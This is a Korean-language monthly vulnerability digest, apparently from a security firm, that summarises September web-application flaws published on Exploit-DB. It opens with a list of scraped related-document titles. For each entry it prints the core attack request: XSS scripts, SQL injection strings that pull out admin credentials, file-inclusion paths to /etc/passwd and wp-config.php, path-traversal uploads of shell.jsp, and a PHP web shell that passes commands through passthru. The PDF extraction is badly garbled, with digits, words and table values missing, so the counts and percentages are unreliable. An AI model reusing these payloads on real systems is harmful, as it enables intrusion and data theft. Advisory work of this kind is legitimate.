EDB 분석보고서 (04.09) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

Similar documents
** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

76 XSS 하 Huge-IT Slider admin.php XSS

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약

EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

Secure Programming Lecture1 : Introduction

Æí¶÷4-¼Ö·ç¼Çc03ÖÁ¾š

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

Observational Determinism for Concurrent Program Security

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

Microsoft Word - junior.docx

105È£4fš

제목 레이아웃

1 01 [ ] [ ] plus 002

문서 템플릿

<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

3장

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

EDB 분석보고서 (05.03) ~ Exploit-DB( 에공개된별로분류한정보입니다 상 상 Spider FAQ - index.php 상 Gallery WD - index.php 36

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대

1

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

PCServerMgmt7

Portal_9iAS.ppt [읽기 전용]

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이

RUCK2015_Gruter_public

Ⅰ. 서론 1989년 CERN의 팀 버너스 리에 의해 만들어진 월드 와이드 웹 기술은 HTML(HyperText Markup Language), URL(Unified Resource Locator, HTTP(Hyper- Text Transfer Protocol)이라는

PowerPoint Template

BEef 사용법.pages

FileMaker 15 WebDirect 설명서

목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항

<4D F736F F F696E74202D E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA E >

SKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc

슬라이드 1

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8

untitled

PowerPoint Presentation

Special Theme _ 모바일웹과 스마트폰 본 고에서는 모바일웹에서의 단말 API인 W3C DAP (Device API and Policy) 의 표준 개발 현황에 대해서 살펴보고 관 련하여 개발 중인 사례를 통하여 이해를 돕고자 한다. 2. 웹 애플리케이션과 네이


CD-RW_Advanced.PDF

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper

Assign an IP Address and Access the Video Stream - Installation Guide

DocsPin_Korean.pages

PowerPoint 프레젠테이션

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

Remote UI Guide

게시판 스팸 실시간 차단 시스템

10.ppt

Microsoft PowerPoint - Smart CRM v4.0_TM 소개_ pptx

Microsoft PowerPoint - CoolMessenger_제안서_라이트_200508

ODS-FM1

±èÇö¿í Ãâ·Â

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

歯sql_tuning2

PowerPoint Presentation

5장 SQL 언어 Part II

6강.hwp

*****

vm-웨어-01장

I T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.

CMS-내지(서진이)


Facebook API

LU8300_(Rev1.0)_1020.indd

내지무인화_

CONTENTS 01 Adobe Photoshop Lightroom을 소개합니다 촬영부터 출력까지 간편한 사진 작업 (Simplify photography from shoot to finish) Adobe Photoshop Lightroom 작업공간(Workspace)

Data Sync Manager(DSM) Example Guide Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager

Chapter 1

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용


PowerPoint 프레젠테이션

Orcad Capture 9.x

특허청구의 범위 청구항 1 몸체(110)의 일측에는 테스트의 필요성에 따라 여타한 디젤 자동차(100)에서 분리시킨 상태의 분리형 커먼레일 인젝트(110)를 고정할 수 있는 분리형 인젝터 고정부(20)가 구비되고, 그 고정부(20)의 하측에는 분리형 커먼 레일 인젝터(

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인

슬라이드 1

슬라이드 제목 없음

Inside Android Applications

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,,,,,,,,,,,,,.,..., U.S. GOVERNMENT END USERS. Oracle programs, including any operat

Contents 3 Info Desk 4 Cover Story 10 New Product A to Z 15 Web Technique 18 Gallery 22 Designer World 27 Customer Spotlight 29 Illustrator Tutorial 3

레이아웃 1

FreeBSD Handbook

(주)나우프로필의 이동형 대표 개편의 방향이 시민참여를 많이 하는 방향이라, 홈페이지 시안 이 매우 간편해져서 소통이 쉬워질 것 같다. 다만 웹보다 모바일 이용자가 지속적으로 급증하는 추세이므로 이에 적합한 구조가 되도록 보장해야 한다. 소셜미디어전략연구소 배운철 대표

Copyright by Korean Local-government Management Institute. ALL RIGHTS RESERVED. No part of this publication may be reproduced, stored in a retrieval s

구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 한

±¹Á¦ÆòÈŁ4±Ç1È£-ÃÖÁ¾

Transcription:

EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04 년 09 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았습니다. 분석된 Cross Site Scripting 공격들은난이도측면에서단순한공격들임에도불구고특정소프트웨어에서다수의취약점이발견되었습니다. 해당소프트웨어를사용는관리자는업데이트를실시여 Cross Site Scripting 공격에노출되지않도록각별한주의가필요합니다, 이번달에는특히 Local File Inclusion 공격에대한취약점이많이보고되었습니다. 해당취약점들은위험도가매우높은취약점들로, 공격이성공할시서버의계정정보는물론다른중요한파일들까지노출될수있어치명적인피해를초래할수있습니다. 해당서버의관리자는사용자입력값을엄격게검증여 Local File Inlcusion 공격을차단할필요가있습니다. 주요소프트웨어취약점발생현황을보면 에서가장많은취약점이보고되었으며다음으로,, Zen Cart 순이였습니다. 앞의두개의소프트웨어는흔히사용는 CMS 이며뒤의두개는전자거래오픈솔루션으로써널리이용되고있는소프트웨어입니다. 네개모두사용률이높은소프트웨어로써자신의소프트웨어가해당소프트웨어중의나라면취약점에대비할수있도록주기적인취약점보안패치실시가반드시필요합니다.. 취약점별보고개수취약점 보고개수 XSS 8 SQL Injection 4 LFI 8 4 File Upload 총합계 45 0 8 4 0 8 4 0 8 4 취약점별보고개수 XSS SQL Injection LFI 8 4 File Upload. 위험도별분류 위험도 보고개수 백분율 7 0.00% 중 8 40.00% 0 0.00% 합계 45 00.00% 8 위험도별분류 7 중 3. 공격난이도별현황공격난이도 보고개수 백분율 4 8.89% 중.% 40 88.89% 총합계 45 00.00% 공격난이도별현황 4 중 40 4. 주요소프트웨어별취약점발생현황소프트웨어이름 Zen Cart ManageEngine Desktop vbulletin MyBB PHP Stock Management System LoadedCommerce Mpay4 phpmyfaq Atmail LittleSite webedition Restaurant Script (PizzaInn Project) Glype Cart Engine OsClass 총합계 보고개수 9 5 3 45 3 주요소프트웨어별취약점발생현황 9 Zen Cart ManageEngine Desktop vbulletin MyBB PHP Stock Management System LoadedCommerce Mpay4 phpmyfaq Atmail LittleSite webedition 5 Restaurant Script (PizzaInn Project) Glype Cart Engine ** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름 3454 File Upload Slideshow Gallery Plugin.4. - admin.php File Upload 취약점 345 Mulitple Themes - admin-ajax.php 취약점 3454 SQL Injection Huge-IT Image Gallery.0. - admin.php SQL

EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 34553 SQL Injection Like Dislike Counter..3 Plugin - ajax_counter.php SQL 34578 LFI Acento Theme - view-pdf.php LFI 취약점 34589 SQL Injection 중 WP Support Plus Responsive Ticket System.0 Plugin - admin-ajax.php SQL 34589 LFI WP Support Plus Responsive Ticket System.0 Plugin - downloadattachment.php SQL 3478 SQL Injection All In One WP Security Plugin 3.8. - admin.php SQL 347 XSS 중 Login Widget With Shortcode 3..- options-general.php XSS 취약점 3457 SQL Injection Spider Calendar <= 3.. - index.php SQL 345 SQL Injection Spider Contacts.3. - index.php SQL 3437 SQL Injection Spider Form Maker <= 3.4 - index.php SQL 34755 LFI Mac Gallery.5 - index.php LFI 취약점 34754 SQL Injection Face Gallery.0 - index.php SQL 34754 LFI Face Gallery.0 - index.php LFI 취약점 3458 XSS 중 - mail.php XSS 취약점 3458 XSS 중 - newsletters.php XSS 취약점 3458 XSS 중 - banner_manager.php XSS 취약점 3458 XSS 중 - countries.php XSS 취약점 3458 XSS 중 - currencies.php XSS 취약점 3458 XSS 중 - languages.php XSS 취약점 3458 XSS 중 Zen Cart.5.3 - media_types.php XSS 취약점 Zen Cart 3458 XSS 중 Zen Cart.5.3 - media_manager.php XSS 취약점 Zen Cart 3458 XSS 중 Zen Cart.5.3 - music_genre.php XSS 취약점 Zen Cart 3458 XSS 중 Zen Cart.5.3 - record_company.php XSS 취약점 Zen Cart 3458 XSS 중 Zen Cart.5.3 - record_artists.php XSS 취약점 Zen Cart

EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 POST /posnic-.0/update_details.php HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 PHP Stock Management System PHP Stock PHP Stock 04-09-0 34405 XSS 중.0 - update_details.php XSS 취 Management Management 약점 System System.0 sname=%3cscript%3ealert%8%9%3b%3c%fscript%3e &address=ghala+mandi&place=old+road&city=multan&pi n=&phone=033570&website=www.hashmitech.webs. com&email=umar%40gmail.com&submit=update POST /statusupdate?actiontocall=lfu&customerid=337&filena me=../../../../../../shell.jsp&configdataid= HTTP/. 04-09-0 3458 ManageEngine Desktop - /statusupdate 취약점 User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 ManageEngin e Desktop ManageEngine Desktop POST /mdm/mdmloguploader?filename=..\\..\\..\webapps\\ Desktop\\shell.jsp HTTP/. 04-09-0 3458 ManageEngine Desktop - /mdmloguploader 취약점 User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 ManageEngin e Desktop ManageEngine Desktop POST /agentloguploader?computername=whatever&domainna me=whatever&customerid=337&filename=..\\..\\..\\..\\webapps\\desktop\\shell.jsp HTTP/. 04-09-0 3458 ManageEngine Desktop - /agentloguploader 취약점 User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 ManageEngin e Desktop ManageEngine Desktop POST http://9.8.3.8/wordpress/wpadmin/admin.php?page=slideshow- slides&method=save HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows 04-09-0 3454 File Upload Slideshow Gallery Plugin.4. - admin.php File Upload 취약점 --------------7dd009908f Slideshow Gallery Plugin.4. -----------------------------7dd009908f filename="backdoor.php" <?php passthru($_get['cmd']);?> -----------------------------7dd009908f-- 04-09-0 345 Mulitple Themes - admin-ajax.php 취약점 /wp-admin/adminajax.php?action=revslider_show_image&img=../wpconfig.php 04-09-0 3454 SQL Injection Huge-IT Image Gallery.0. - admin.php SQL /wordpress/wpadmin/admin.php?page=gallerys_huge_it_gallery&task=edit _cat&id=&removeslide=%0and%0= Huge-IT Image Gallery.0.

EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 POST /wp-content/plugins/like-dislike-counter-for-postspages-and-comments/ajax_counter.php HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 04-09-03 345 SQL Injection AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 vbulletin 4.0.x - 4.. - vbulletin 4.0.x vbulletin search.php SQL - 4.. post_id%3d%0and%0%3d%up_type%3dlike POST /mybb/usercp.php HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 04-09-05 34539 XSS 중 MyBB User Social Networks Plugin. - usercp.php XSS 취약점 my_post_key=a3baa4af93035458a448dda4b&bday =&bday=&bday3=&birthdayprivacy=all&website=http% MyBB MyBB User Social Networks Plugin. 3A%F%F&profile_fields%5Bfid3%5D=Undisclosed&profile _fields%5bfid%5d=&profile_fields%5bfid%5d=&icq=&ai m=&msn=&yahoo=%3e%3cscript%3ealert%8document.c ookie%9%3c%fscript%3e%3c&away=0&awayreason=& awayday=&awaymonth=&awayyear=&action=do_profile&r egsubmit=update+profile POST /wp-content/plugins/like-dislike-counter-for-postspages-and-comments/ajax_counter.php HTTP/. 04-09-07 34553 SQL Injection Like Dislike Counter..3 Plugin - ajax_counter.php SQL User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 Like Dislike Counter..3 Plugin post_id%3d%0and%0%3d%up_type%3dlike POST /register/ HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows --------------7dd009908f -----------------------------7dd009908f 04-09-07 3455 SQL Injection LoadedCommerce7 - /register/ SQL Content-Disposition: form-data; name="field_" :entry_lastname, LoadedComm erce LoadedComm erce7 -----------------------------7dd009908f Content-Disposition: form-data; name="field_",(select user_name from lc_administrators order by id asc limit ),(select user_password from lc_administrators order by id asc limit ),3,4,5,,7,8,9,0)# -----------------------------7dd009908f filename="" 04-09-08 3458 SQL Injection Mpay4 PrestaShop Payment Module.5 - confirm.php SQL /modules/mpay4/confirm.php?mpaytid=&status=bbb &TID=a%7%0or%0%7a%7%0in%0%8select%0IF %8SUBSTR%8@@version,,%9=5,BENCHMARK%80 00000,SHA%80xDEADBEEF%9%9,%0false%9%9;% 0--%3 Mpay4 Mpay4 PrestaShop Payment Module.5 /catalog/admin/mail.php?action=preview HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 04-09-08 3458 XSS 중 - mail.php XSS 취약점 customers_email_address=<script>alert()</script>&fro m=fuck@shit.up&subject=test&message=test

EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 /catalog/admin/newsletters.php?action=insert HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 04-09-08 3458 XSS 중 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 - newsletters.php XSS 취약점 module=newsletter&title=<script>alert(3)</script>&cont ent=<script>alert(45)</script> /catalog/admin/banner_manager.php?action=insert HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows 04-09-08 3458 XSS 중 --------------7dd009908f - banner_manager.php XSS 취약점 -----------------------------7dd009908f Content-Disposition: form-data; name="banners_title" <script>alert();</script> -----------------------------7dd009908f filename="info.gif" <?php passthru($_get['cmd']);?> -----------------------------7dd009908f-- /catalog/admin/countries.php?page=&action=insert HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 04-09-08 3458 XSS 중 - countries.php XSS 취약점 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 countries_name=aaa<script>alert()</script> /catalog/admin/currencies.php?page=&action=insert HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 04-09-08 3458 XSS 중 - currencies.php XSS 취약점 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 title=<script>alert()</script> /catalog/admin/languages.php?action=insert HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 04-09-08 3458 XSS 중 - languages.php XSS 취약점 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 name=<script>alert()</script>

EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 POST /create-content/gallery HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows --------------7dd009908f 04-09-08 34579 XSS 중 vbulletin 5..X - /gallery XSS 취약점 -----------------------------7dd009908f vbulletin vbulletin 5..X Content-Disposition: form-data; name="title_3" cool" onmouseover=alert() xssed=" -----------------------------7dd009908f filename="" -----------------------------7dd009908f-- GET /phpmyfaq/index.php HTTP/. 04-09-08 34580 XSS 중 phpmyfaq.8.x - index.php XSS 취약점 User-Agent: <script>alert()</script> Referer: <script>alert(3)</script> phpmyfaq phpmyfaq.8.x 04-09-08 3457 SQL Injection Spider Calendar <= 3.. - index.php SQL Injection 취약점 /joomla/index.php?option=com_spidercalendar&calendar_i d=%0and%0=-- Spider Calendar <= 3.. POST /zen/zen-cart-v.5.3-070404/admin3/media_types.php?page=&mid=&ac tion=save HTTP/. 04-09-08 3458 XSS 중 Zen Cart.5.3 - media_types.php XSS 취약점 User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Zen Cart Zen Cart.5.3 --------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="type_name" <script>alert()</script> -----------------------------7dd009908f POST /zen/zen-cart-v.5.3-070404/admin3/media_types.php?page=&mid=&ac tion=save HTTP/. 04-09-08 3458 XSS 중 Zen Cart.5.3 - media_manager.php XSS 취약점 User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Zen Cart Zen Cart.5.3 --------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="media_name" <script>alert()</script> -----------------------------7dd009908f

EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 POST /zen/zen-cart-v.5.3-070404/admin3/music_genre.php?action=insert HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows 04-09-08 3458 XSS 중 Zen Cart.5.3 - music_genre.php XSS 취약점 Zen Cart Zen Cart.5.3 --------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="music_genre_name" <script>alert()</script> -----------------------------7dd009908f POST /zen/zen-cart-v.5.3-070404/admin3/record_company.php?action=insert HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows 04-09-08 3458 XSS 중 Zen Cart.5.3 - record_company.php XSS 취약점 Zen Cart Zen Cart.5.3 --------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="record_company_name" <script>alert()</script> -----------------------------7dd009908f POST /zen/zen-cart-v.5.3-070404/admin3/record_artists.php?action=insert HTTP/. 04-09-08 3458 XSS 중 Zen Cart.5.3 - record_artists.php XSS 취약점 User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Zen Cart Zen Cart.5.3 --------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="artists_name" <script>alert()</script> -----------------------------7dd009908f 04-09-08 34578 LFI Acento Theme - view-pdf.php LFI 취약점 /wp-content/themes/acento/includes/viewpdf.php?download=&file=/etc/passwd Acento Theme POST /mail/index.php/mail/mail/listfoldermessages/searching/tru e/selectfolder/inbox./resultcontext/searchresultstab HTTP/. 04-09-08 34585 XSS 중 Atmail Webmail 7. - /mail/index.php/mail/mail/listfol dermessages/searching/true/sel ectfolder/inbox./resultcont ext/searchresultstab XSS 취약점 User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 Atmail Atmail Webmail 7. searchquery=&goback=&from=&to=&subject=&body= &filter=<script>alert()</script> POST /wp-admin/admin-ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 04-09-09 34589 SQL Injection 중 WP Support Plus Responsive Ticket System.0 Plugin - admin-ajax.php SQL AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 WP Support Plus Responsive Ticket System.0 Plugin action=openticket&ticket_id=- UNION SELECT concat_ws(0x3a,version(),database(),user()),,3,4,5,,7 * any registered user can successfully execute this request

EDB 분석보고서 (04.09) 04-09- 345 SQL Injection Spider Contacts.3. - index.php SQL /joomla/index.php?option=com_spidercontacts&contact_i d=%0and%0=&view=showcontact&lang=ca Spider Contacts.3. 04-09- 3437 SQL Injection Spider Form Maker <= 3.4 - index.php SQL /index.php?option=com_formmaker&view=formmaker&id =%0and%0= Spider Form Maker <= 3.4 04-09-0 347 SQL Injection SelectSurvey.net - ReviewReadOnlySurvey.aspx SQL /survey/reviewreadonlysurvey.aspx?responseid=<num>& SurveyID=%0and%0= SelectSurvey.n et 4.4.004 04-09-0 347 SQL Injection SelectSurvey.net - UploadImagePopupToDb.aspx SQL /survey/uploadimagepopuptodb.aspx?responseid=<num >&SurveyID=%0and%0= SelectSurvey.n et 4.4.004 04-09-3 34747 LFI 04-09-4 347 LFI 04-09-4 3470 XSS 중 04-09-4 34755 LFI 04-09-4 34754 SQL Injection 04-09-4 34754 LFI 04-09-4 34758 LFI 04-09-5 3478 SQL Injection LittleSite 0. - index.php LFI 취약 /littlesite/index.php?file=../../../../etc/passwd LittleSite LittleSite 0. 점 webedition.3.8.0 - webedition /webedition/showtempfile.php?file=../../../../etc/passwd webedition showtempfile.php LFI 취약점.3.8.0 Restaurant Script(PizzaInn Project) - register-exec.php XSS 취약점 Mac Gallery.5 - index.php LFI 취약점 Face Gallery.0 - index.php SQL Face Gallery.0 - index.php LFI 취약점 Glype.4.9 - browse.php LFI 취 약점 All In One WP Security Plugin 3.8. - admin.php SQL /PizzaInn/register-exec.php? fname=<script>alert()</script>&lname=<script>alert()</s cript>&login=<script>alert()</script>&password=r00t&cpa ssword=r00t&question=8&answer=hack4&submit=registe r /index.php?option=com_macgallery&view=download&alb umid=../../etc/passwd /index.php?option=com_facegallery&view=images&aid= %0and%0=&lang=en /index.php?option=com_facegallery&task=imagedownloa d&img_name=../../etc/passwd GET /browse.php?u=&b=8 HTTP/. Cookie: s=../security 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 WP Support Plus WP Support Responsive Ticket System.0 /wp-content/plugins/wp-support-plus-responsive-ticketsystem/includes/admin/downloadattachment.php?path=/et Plus 04-09-09 34589 LFI Plugin - Responsive downloadattachment.php SQL c/passwd Ticket System.0 Plugin /wpadmin/admin.php?page=aiowpsec&tab=tab&order=,% 8select%0load_file%8CONCAT%8CHAR%89%9, CHAR%89%9,%8select%0version%8%9%9,C HAR%84%9,CHAR%897%9,CHAR%8%9,C HAR%8%9,CHAR%897%9,CHAR%899%9,C HAR%807%9,CHAR%80%9,CHAR%84% 9,CHAR%84%9,CHAR%899%9,CHAR%8% 9,CHAR%809%9,CHAR%89%9,CHAR%80% 9,CHAR%8%9,CHAR%8%9,CHAR%898 %9,CHAR%897%9,CHAR%84%9%9%9% 9 POST /zen/zen-cart-v.5.3-070404/admin3/media_types.php?page=&mid=&ac tion=save HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows --------------7dd009908f Restaurant Script (PizzaInn Project) Restaurant Script (PizzaInn Project) Mac Gallery.5 Face Gallery.0 Face Gallery.0 Glype Glype.4.9 All In One WP Security Plugin 3.8. 04-09-5 3474 SQL Injection Cart Engine 3.0 - cart.php SQL -----------------------------7dd009908f Content-Disposition: form-data; name="item_id[0]" Cart Engine Cart Engine 3.0 8' AND (SELECT FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,floor(rand()*))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql -----------------------------7dd009908f filename="" 04-09-5 3473 LFI OsClass 3.4. - index.php LFI 취약점 /osclass/ocadmin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd OsClass OsClass 3.4.

EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 04-09-5 347 XSS 중 Login Widget With Shortcode 3..- optionsgeneral.php XSS 취약점 POST /wp-admin/optionsgeneral.php?page=login_widget_afo HTTP/. User-Agent: Mozilla/5.0 Windows NT.; WOW4 AppleWebKit/535.7 KHTML, like Gecko Chrome/.0.9.75 Login Widget With Shortcode 3.. custom_style_afo=</textarea><script>alert()</script >